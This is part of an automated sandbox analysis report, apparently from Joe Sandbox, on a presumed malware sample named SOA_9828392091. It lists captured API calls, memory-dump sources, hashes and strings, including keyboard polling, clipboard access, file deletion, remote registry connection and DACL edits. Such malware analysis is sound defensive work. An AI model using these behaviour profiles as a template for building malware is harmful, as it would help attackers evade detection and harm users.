                                      • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0099F59C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                      • API String ID: 2166380349-3440237614
                                      • Opcode ID: 2ff1d54d01c355907e5e83fa319520580b686fb13e7f44becea94294a5973beb
                                      • Instruction ID: 1c7dfc41be1d4c6d682b55166f0a289598feb3f3ef093ae53a32678f524ca521
                                      • Opcode Fuzzy Hash: 2ff1d54d01c355907e5e83fa319520580b686fb13e7f44becea94294a5973beb
                                      • Instruction Fuzzy Hash: CF6139B1508301AFC711EF64DC85EABBBF8BFC9714F400A2EF595921A1DB709A09CB52
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00981CAB
                                      • _wcscmp.LIBCMT ref: 00981CC0
                                      • _wcscmp.LIBCMT ref: 00981CD7
                                        • Part of subcall function 00976BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00976BEF
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00981D06
                                      • FindClose.KERNEL32(00000000), ref: 00981D11
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00981D2D
                                      • _wcscmp.LIBCMT ref: 00981D54
                                      • _wcscmp.LIBCMT ref: 00981D6B
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00981D7D
                                      • SetCurrentDirectoryW.KERNEL32(009E39FC), ref: 00981D9B
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00981DA5
                                      • FindClose.KERNEL32(00000000), ref: 00981DB2
                                      • FindClose.KERNEL32(00000000), ref: 00981DC2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                      • String ID: *.*
                                      • API String ID: 1824444939-438819550
                                      • Opcode ID: f90a99e05ddd4a0f2b936a3002d9800a31accfc3e26a02ca896b9e038a4edb1d
                                      • Instruction ID: 39eb689a55ae54bd566bf2b53c025d37f988d6a74f30de6475e63f2ff0a49ac0
                                      • Opcode Fuzzy Hash: f90a99e05ddd4a0f2b936a3002d9800a31accfc3e26a02ca896b9e038a4edb1d
                                      • Instruction Fuzzy Hash: 7E31163250561A6ACF14FFA4DC48FEE37ACAF45324F104691F800A32D1EB70DE468B54
                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 009809DF
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 009809EF
                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009809FB
                                      • __wsplitpath.LIBCMT ref: 00980A59
                                      • _wcscat.LIBCMT ref: 00980A71
                                      • _wcscat.LIBCMT ref: 00980A83
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00980A98
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00980AAC
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00980ADE
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00980AFF
                                      • _wcscpy.LIBCMT ref: 00980B0B
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00980B4A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                      • String ID: *.*
                                      • API String ID: 3566783562-438819550
                                      • Opcode ID: aa42f2beeec729950761e20a1029d68617cc4b58c8406f8cefe36c0e269c54cd
                                      • Instruction ID: 0ce30476de1f8dc157163d7ce01b5e893a53b74e485c9bf12504ac64ac4e9ac0
                                      • Opcode Fuzzy Hash: aa42f2beeec729950761e20a1029d68617cc4b58c8406f8cefe36c0e269c54cd
                                      • Instruction Fuzzy Hash: D7613A725083059FD710EF60C885A9EB3E8FFC9314F04895AF99987251EB35E949CB92
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0099EF3B
                                      • GetFocus.USER32 ref: 0099EF4B
                                      • GetDlgCtrlID.USER32(00000000), ref: 0099EF56
                                      • _memset.LIBCMT ref: 0099F081
                                      • GetMenuItemInfoW.USER32 ref: 0099F0AC
                                      • GetMenuItemCount.USER32(00000000), ref: 0099F0CC
                                      • GetMenuItemID.USER32(?,00000000), ref: 0099F0DF
                                      • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0099F113
                                      • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0099F15B
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0099F193
                                      • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0099F1C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                      • String ID: 0
                                      • API String ID: 3616455698-4108050209
                                      • Opcode ID: 5c70a6cdd06a0dc922d49c25a284a3e36c0fe253e93d18062e17fb500dc3271e
                                      • Instruction ID: 31b5d10f25cff0d9fde84e96c04647f40a009d4f8617358ca9b0d487afc2800d
                                      • Opcode Fuzzy Hash: 5c70a6cdd06a0dc922d49c25a284a3e36c0fe253e93d18062e17fb500dc3271e
                                      • Instruction Fuzzy Hash: 22819D71509305EFDB20CF19C994A6BBBE8FB88314F10492EF998D7291D770D905CBA2
                                      APIs
                                        • Part of subcall function 0096ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0096ABD7
                                        • Part of subcall function 0096ABBB: GetLastError.KERNEL32(?,0096A69F,?,?,?), ref: 0096ABE1
                                        • Part of subcall function 0096ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0096A69F,?,?,?), ref: 0096ABF0
                                        • Part of subcall function 0096ABBB: RtlAllocateHeap.NTDLL(00000000,?,0096A69F), ref: 0096ABF7
                                        • Part of subcall function 0096ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0096AC0E
                                        • Part of subcall function 0096AC56: GetProcessHeap.KERNEL32(00000008,0096A6B5,00000000,00000000,?,0096A6B5,?), ref: 0096AC62
                                        • Part of subcall function 0096AC56: RtlAllocateHeap.NTDLL(00000000,?,0096A6B5), ref: 0096AC69
                                        • Part of subcall function 0096AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0096A6B5,?), ref: 0096AC7A
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0096A6D0
                                      • _memset.LIBCMT ref: 0096A6E5
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0096A704
                                      • GetLengthSid.ADVAPI32(?), ref: 0096A715
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0096A752
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0096A76E
                                      • GetLengthSid.ADVAPI32(?), ref: 0096A78B
                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0096A79A
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0096A7A1
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0096A7C2
                                      • CopySid.ADVAPI32(00000000), ref: 0096A7C9
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0096A7FA
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0096A820
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0096A834
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                      • String ID:
                                      • API String ID: 2347767575-0
                                      • Opcode ID: 64ab21d442007bc24dabff539f53f8d0a3eb0cdf09ecb556cb5f17fcddabb822
                                      • Instruction ID: 93d24c0fdd752ad1f65cd43377cb91f4c432c4a5a68dcd50f3b3844115619b5e
                                      • Opcode Fuzzy Hash: 64ab21d442007bc24dabff539f53f8d0a3eb0cdf09ecb556cb5f17fcddabb822
                                      • Instruction Fuzzy Hash: 2B515B7190020AAFDF04DFA5DD85AEEBBB9FF04310F048129F911A72A0EB359A05DF61
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$ZZQCWCVCM
                                      • API String ID: 0-876813228
                                      • Opcode ID: e7bbc7deed6f33e2c0d2a9c4419e219fc0ae52ae15c22d1ab24b86a5d21dbb74
                                      • Instruction ID: b99fe2c044c422d64ae388d5ae3e17313549166feff81e7ece6eba3f8df921fb
                                      • Opcode Fuzzy Hash: e7bbc7deed6f33e2c0d2a9c4419e219fc0ae52ae15c22d1ab24b86a5d21dbb74
                                      • Instruction Fuzzy Hash: C7728FB1E042199BDB24CF99D9807EEB7B5FF48320F14856AE815EB280DB349E41DF90
                                      APIs
                                        • Part of subcall function 00976EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00975FA6,?), ref: 00976ED8
                                        • Part of subcall function 009772CB: GetFileAttributesW.KERNEL32(?,00976019), ref: 009772CC
                                      • _wcscat.LIBCMT ref: 00976441
                                      • __wsplitpath.LIBCMT ref: 0097645F
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00976474
                                      • _wcscpy.LIBCMT ref: 009764A3
                                      • _wcscat.LIBCMT ref: 009764B8
                                      • _wcscat.LIBCMT ref: 009764CA
                                      • DeleteFileW.KERNEL32(?), ref: 009764DA
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 009764EB
                                      • FindClose.KERNEL32(00000000), ref: 00976506
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                      • String ID: \*.*$p1#v`K$v
                                      • API String ID: 2643075503-1732502266
                                      • Opcode ID: 054cfc867a5a1e57eddf97e272e1a92b07fc49670526a7e93c4a7928797c1948
                                      • Instruction ID: 1a2e0b998ce7ea3d34f379c01aa4960ba9e5ebcc972ce31e8adb1c800860c533
                                      • Opcode Fuzzy Hash: 054cfc867a5a1e57eddf97e272e1a92b07fc49670526a7e93c4a7928797c1948
                                      • Instruction Fuzzy Hash: 3931A2B340C3849AC321DBA4C885ADBB7DCAF96310F044A2AF9D8C3141EB35D50D87A7
                                      APIs
                                        • Part of subcall function 00993C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00992BB5,?,?), ref: 00993C1D
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0099328E
                                        • Part of subcall function 0093936C: __swprintf.LIBCMT ref: 009393AB
                                        • Part of subcall function 0093936C: __itow.LIBCMT ref: 009393DF
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0099332D
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009933C5
                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00993604
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00993611
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                      • String ID:
                                      • API String ID: 1240663315-0
                                      • Opcode ID: 4b6107244c470ce804d83cfed8e284ea49c5b725be1c9a580c72b84469072bfb
                                      • Instruction ID: 8548c2311a9d17157dba674ad241602311596a52ab908ef812ba39bd026126e2
                                      • Opcode Fuzzy Hash: 4b6107244c470ce804d83cfed8e284ea49c5b725be1c9a580c72b84469072bfb
                                      • Instruction Fuzzy Hash: B0E14A71604200AFCB14DF69C995E2ABBE9EF89714F04C96DF44ADB2A1DB30E905CF52
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00972B5F
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00972BE0
                                      • GetKeyState.USER32(000000A0), ref: 00972BFB
                                      • GetAsyncKeyState.USER32(000000A1), ref: 00972C15
                                      • GetKeyState.USER32(000000A1), ref: 00972C2A
                                      • GetAsyncKeyState.USER32(00000011), ref: 00972C42
                                      • GetKeyState.USER32(00000011), ref: 00972C54
                                      • GetAsyncKeyState.USER32(00000012), ref: 00972C6C
                                      • GetKeyState.USER32(00000012), ref: 00972C7E
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00972C96
                                      • GetKeyState.USER32(0000005B), ref: 00972CA8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: 2c55c7c1d3333f6788b3b7844c6996ae100814b20f19cab60031757c34a13d32
                                      • Instruction ID: 88d2960f0d6b15af28721628e58e0bab464f6809cadbf0663f9573fb8aa195cf
                                      • Opcode Fuzzy Hash: 2c55c7c1d3333f6788b3b7844c6996ae100814b20f19cab60031757c34a13d32
                                      • Instruction Fuzzy Hash: 3841E9315287C96DFF369B6489047B9BFA8AF32314F0CC099D5CA562C1EBD499C4C7A2
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                      • String ID:
                                      • API String ID: 1737998785-0
                                      • Opcode ID: 1aebd965c5e788f984a8c2f15da0bb6a6c4ee1f35cc4e261cd59bdd868b97e90
                                      • Instruction ID: 5245d02466a24a08ec40ea885c2ef3227dea9906b97974ec351bc75f7371fb5f
                                      • Opcode Fuzzy Hash: 1aebd965c5e788f984a8c2f15da0bb6a6c4ee1f35cc4e261cd59bdd868b97e90
                                      • Instruction Fuzzy Hash: 44219A31315210EFEB11AF65DE49F2D77A8FF84721F04841AF94ADB2A1EB34E9009B90
                                      APIs
                                        • Part of subcall function 00969ABF: CLSIDFromProgID.COMBASE ref: 00969ADC
                                        • Part of subcall function 00969ABF: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00969AF7
                                        • Part of subcall function 00969ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00969B05
                                        • Part of subcall function 00969ABF: CoTaskMemFree.COMBASE(00000000), ref: 00969B15
                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0098C235
                                      • _memset.LIBCMT ref: 0098C242
                                      • _memset.LIBCMT ref: 0098C360
                                      • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 0098C38C
                                      • CoTaskMemFree.COMBASE(?), ref: 0098C397
                                      Strings
                                      • NULL Pointer assignment, xrefs: 0098C3E5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                      • String ID: NULL Pointer assignment
                                      • API String ID: 1300414916-2785691316
                                      • Opcode ID: e34036a5d4f6c011951aeb586695063fc4dfda38437cb060248d4a39ebecc392
                                      • Instruction ID: e20ffaa452a67300ca98f510d46de44d1a4b97fb1313a310d2701d5f4af05246
                                      • Opcode Fuzzy Hash: e34036a5d4f6c011951aeb586695063fc4dfda38437cb060248d4a39ebecc392
                                      • Instruction Fuzzy Hash: 4E913DB1D00218ABDB10EFA4DC95FEEBBB8EF44710F10816AF515A7291EB705A45CFA0
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • GetSystemMetrics.USER32(0000000F), ref: 009A016D
                                      • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 009A038D
                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009A03AB
                                      • InvalidateRect.USER32(?,00000000,00000001,?), ref: 009A03D6
                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009A03FF
                                      • ShowWindow.USER32(00000003,00000000), ref: 009A0421
                                      • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 009A0440
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$MessageSend$DialogInvalidateLongMetricsMoveNtdllProc_RectShowSystem
                                      • String ID:
                                      • API String ID: 2922825909-0
                                      • Opcode ID: 39216dee1c20c740e31917c55fa20cea1e54be2e09103da1901f50eeeabbcf6b
                                      • Instruction ID: 82f6fadf95968aec58d1eb97ea01fe6d6d6c8e3a83c3d08066be1a40749d25b7
                                      • Opcode Fuzzy Hash: 39216dee1c20c740e31917c55fa20cea1e54be2e09103da1901f50eeeabbcf6b
                                      • Instruction Fuzzy Hash: 13A1A035600616EFDF18CF68C9897BDBBB5BF89750F048115EC549B250EB34AD50CB90
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                        • Part of subcall function 0094B63C: GetCursorPos.USER32(000000FF), ref: 0094B64F
                                        • Part of subcall function 0094B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0094B66C
                                        • Part of subcall function 0094B63C: GetAsyncKeyState.USER32(00000001), ref: 0094B691
                                        • Part of subcall function 0094B63C: GetAsyncKeyState.USER32(00000002), ref: 0094B69F
                                      • ReleaseCapture.USER32 ref: 0099ED48
                                      • SetWindowTextW.USER32(?,00000000), ref: 0099EDF0
                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0099EE03
                                      • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0099EEDC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
